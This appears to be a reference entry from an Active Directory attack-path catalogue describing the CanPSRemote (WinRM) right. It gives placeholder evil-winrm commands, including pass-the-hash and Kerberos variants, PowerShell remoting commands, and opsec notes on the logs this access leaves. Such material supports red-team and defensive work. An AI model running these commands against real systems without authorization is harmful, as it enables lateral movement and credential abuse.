CanPSRemote
Principal has the right to use PowerShell Remoting (WinRM) to the target computer.
Applies to: User/Group β Computer
Linux Abuse
evil-winrm (password)
evil-winrm -i <target> -u <username> -p '<password>' -d <domain>
evil-winrm (pass-the-hash)
evil-winrm -i <target> -u <username> -H <ntlm-hash>
evil-winrm (Kerberos)
KRB5CCNAME=<ccache> evil-winrm -i <target> -r <domain>
evil-winrm (SSL)
evil-winrm -i <target> -u <username> -p '<password>' -S
Windows Abuse
Enter-PSSession (interactive)
$cred = Get-Credential
Enter-PSSession -ComputerName <target> -Credential $cred
Invoke-Command (non-interactive)
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
Invoke-Command -ComputerName <target> -Credential $cred -ScriptBlock { whoami; hostname }
New-PSSession (persistent)
$session = New-PSSession -ComputerName <target> -Credential $cred
Invoke-Command -Session $session -ScriptBlock { whoami }
Enter-PSSession -Session $session
Opsec
- WinRM uses ports 5985 (HTTP) and 5986 (HTTPS)
- Generates Event ID 4624 (logon type 3) and PowerShell script block logging (4104) if enabled
- evil-winrm uploads to
%TEMP%by default β use-tto change temp path